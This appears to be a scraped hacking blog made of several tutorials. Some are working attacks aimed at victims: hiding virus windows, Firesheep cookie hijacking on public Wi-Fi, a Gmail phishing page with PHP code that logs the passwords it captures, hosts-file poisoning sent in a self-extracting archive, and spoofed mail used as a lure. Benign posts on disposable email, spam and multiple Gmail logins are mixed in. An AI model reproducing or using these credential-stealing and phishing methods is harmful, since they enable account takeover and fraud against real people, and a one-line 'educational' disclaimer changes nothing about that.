How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.



About Cmdow

Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

http://www.commandline.co.uk/cmdow/

How to Hack Facebook account using Wi-Fi?

Recently You mozilla add on namely " FireSheep" is used for hack thousands of email accounts . As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly  within 24 hours.

What is the Special in FireSheep?
 Using FireSheep add on you can control any account without knowing the username and password .   Famous Social Network Facebook is victim of this Firesheep.



How?
The Firesheep uses HTTP Session Hijacking to  gain the username and password.

What is HTTP Session Hijacking?
Attacker use HTTP session Hijacking to steal the cookies from victim.  Cookies are file which contains the password and username .

Using this HTTP Session Hijacking method you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How to use this Firesheep to steal the cookies?
 You will need this requirements:

• Public wifi access 
• winpcap
• Firesheep(Download)

Step 1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.

Step 2:

Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep

Step 3:

Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

How to create fake or Phishing web page for gmail

 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Different types of Email Account Hacking

The Basic level Hacking is Email Account Hacking.  Everyone like to do first email account hacking only.  So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking .  Here is some of them :

1. Social Engineering
   
   • Phishing
2. Brute Force Attack
3.  Keylogger
4.  Guessing the Answer for the Security Question

Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim.  Hackers will send mail to victim.  The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:

     It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that the mail sites will ask for the security questions to retrieve the mail account?  You can hack the mail account simply guessing the answer.  If the victim is your friend ,then it may very easy to hack. 

Brute Force Attack:



A famous and traditional attacking method .  In this method ,the password will be found by trying all possible passwords with any program or software.




Keyloggers:


  It is one of the spyware which will capture what you type in the keyboard.  so whenever you type the username and password ,it will simply capture.

   It is software program which will be attached with any softwares and send to victim.  While victim install the software ,the keylogger also start to work.  Keyloggers are exe files.



Note:
This Email Account Hacking Tutorial is truly for educational purpose only.

Use Original Domain Address for Phishing Web page

Hi friends ,  you may have known about how to create phishing web Page.  If you don't know about Phishing Web Page, you need to read this tutorials first:

        Different Types of Email account
        How To Create fake or phishing web page

Once you know the basics of Phishing web Page ,come to this post.

Ok friends, there's one drawback in our traditional Phishing web page method. You know what is it? You are right, the url of our phishing web page. It may look like the real one,but it is not.


For eg: we may create the Phishing web page with www.gmails.com but it's not at all same as www.gmail.com

Probably, the experienced internet users will notice the URL of web Page. So they won't fall in our Fishnet.

What we are going to do now?
Why should not we make the phishing web page's URL looks exactly same as the real Domain Name? You may ask "is it possible?". My answer is yes, you can. It sounds good na? go ahead.

How we are going to implement?
 We are going to send an email with an executable to victim.
If the victim double click the executable file, then you are done.
Now whenever the victim enter the real domain name (like www.facebook.com) ,he will be in our phishing web page.
Don't worry the domain name is original URL(like www.facebook.com)

Got surprised....!!!! You may ask how this is done,go ahead.

How it is done?
   Executable file will change the Host file of Victim system. 
What is host file?
     The host file contains Domain Name and IP address associated with them.  Your host file will be in this path:

C:\Windows\System32\drivers\etc\

Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server).  This DNS connect to the IP address which is associated with the Domain Name.   But before this to be done, the host file in our system will check for the IP address associated with the Domain Name.  Suppose we make an entry with Domain Name and IP address of our phishing web page(for  eg: www.webaddress.com wiht our ip 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name.  This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.


Now Let's divide into the Implementation:

• If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address.
  

So what you can do overcome this problem? You need to set up your own Webserver in home. Using Webserver softwares you can set up your own Hosting service.

  Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.

How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:

C:\Wamp\WWW

And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :

your_ip     domain_name

For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
 
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:

Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.


Some Disadvantages of this Hack:

•    If your IP address is dynamically changed ,then it is hard to implement it
•   If your victim is advanced user,he may notice the certificates of site which is shown by browser.

Don't worry it is not at all big problem.   Just try it ane enjoy it.

Temporary Disposable Email address Services

 While signing up to an online account or doing such stuff on web, you can use these temporary disposable email addresses provided by email services. This keeps your real email address protected from spam. These services provide you with email addresses of the format you desire. Temporary email addresses last for time duration varying from few hours to some months, depending on the type of service you use.

6 Best Temporary Disposable Email address providers:

Just check out the below list for some of the best disposable email address services:


1. Mailinator:
This is one of the top rated temporary email providers which provides you address of the format something@mailinator.com

2. Yopmail:
Another temporary email address service with good user-friendly email interface. I have tried many services and found yopmail having one of the best interfaces. What more, don't need any cubersome registration process. Simply enter any desired email address and Yopmail has it.

3. Spamgourmet:
This is efficient spam blocker temporary email address service which has also got good reviews elsewhere on web.

4. Jetable:
This is multi-functinal temporary inbox provider which allows you to define time span for which your temporary inbox will be valid. Also, you can forward the temporary inbox mails to your real email address.

5. Spambox:
One of the best feature of this service is time span of disposable email address can be as long as 1 year. This is really a large span. It provides all other features for temporary email address.

6. Mailexpire:
Create an alias email address for your real email address. Mailexpire provides you temporary email address for as long as 3 months. If you want to delete alias mail id instantly, you are always provided with a link to delete your alias temporary disposable email address.

You can now send a self destruction Email from Big string

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.This is great trick for you .  You can now send a self destruction.  After users reads the mail ,the mail will be deleted automatically.  You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility.

 

        Get a free account

How you are getting large number of spam mail ? Know why

Are you getting lot of spam mails to your inbox?  Do you know why it comes to your mail? The mistake is yours only.  Because of you only you are getting larger number of spam.  How you responsible for that? Go ahead to know what is your mistake.

Spam Mail Definition:
Also known as junk mail.  Sending large number of identical message to numerous recipients .   Advertisers ,merchants sends large number of mail to recipients for advertising purpose using softwares and some websites.



How they get your email id?
They get your mail id because of your mistakes only.

Social Networking Sites:
Most of you use social networking sites daily.  I won't say using social networking sites is bad.  But sending request or accepting stranger is one of the major reason for getting spam mail.  Advertisers will gain your weakness.  If you are blindly accepting the request means, spam mail will be definitely in your mail. Sometimes they get your phone number and send advertisement to your mobile or some other communication sources.

What you have to do?
Apply privacy setting for your contact information.  Don't accept the request from strangers(in order to attract you they may send you request like a girl).

Online Games and contests:
Some websites tell you that they will give prize if you win in the online game.  This is also one of the reason for getting spam mail.

Job /Career websites:
Job offering websites is the major reason for getting spam mail.  But some website sell your mail to advertisers.  This will result in spam.

Forum:
Like i said for social networking site, in forum also you have to consider the privacy settings.
 
Select "Don't show mail and Don't receive mail from members" so that you can avoid of getting spam mails.

Mail Searching:
Advertisers(spammers) search for mail id in internet using some softwares(like @mail.com )
If you are webmaster ,you may give contactus link with
mailto:mailid@domain.com.
Spammers  can find your mail id if you give the mail id plainly like this.
 tips:

• Use 123 contact forms for hiding your mail id.
• or show mail id like this : mailid[at]domain[dot]com
• Use mail Badge Image(i mean show your mail id as image).

Overall suggestion:
Use two mail id.  One is for contributing in online.  Other one is personal.

How to Access Multiple Gmail accounts in Firefox without logout?

are you having multiple gmail accounts? As far as browsers concerned , we can login with only one gmail account. Here i am going to introduce a new Mozilla add on. This add on will allow you to login in multiple account without logout the accounts.

How to do?

visit:

https://addons.mozilla.org/firefox/addon/748

and Install the Add on.

Now visit:

http://userscripts.org/scripts/show/16341

click on “Install” button located at the top right side.


Now you can access multiple gmail accounts. You can see the drop down box at the top right side.

Change the user as your wish without logout.

Enjoy !

Don't trust all script . Sometimes These scripts will harmful for you. So verify whether it is not harmful by searching in google.

How to send Anonymous Mail to anyone|Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.

What is the Use?
   I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.

For Eg:
You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Step 1:
First of all you need to register in free web hosting service which has PHP feature.  So my choice is

       x10hosting.com

Step 2:
Now Download this zip file:

             Mail.php

Inside the file you can find the mail.php file. Extract the file

Step 3:
Now Go to x10hosting.com and login with your username and password.
Upload the "mail.php" file to "public_html" folder.

Step 4:
That's all you finished.
Now go to this page

         yourhosturl/mail.php

Change the yourhosturl with your website url which you gave it when you register in x10hosting.com
For eg:
yourfavorites.x10.mx/mail.php

Usually the default will be "name.x10.mx"

When you visit you will see the form just like this:

Fill the form with your victim mail address and message subject and send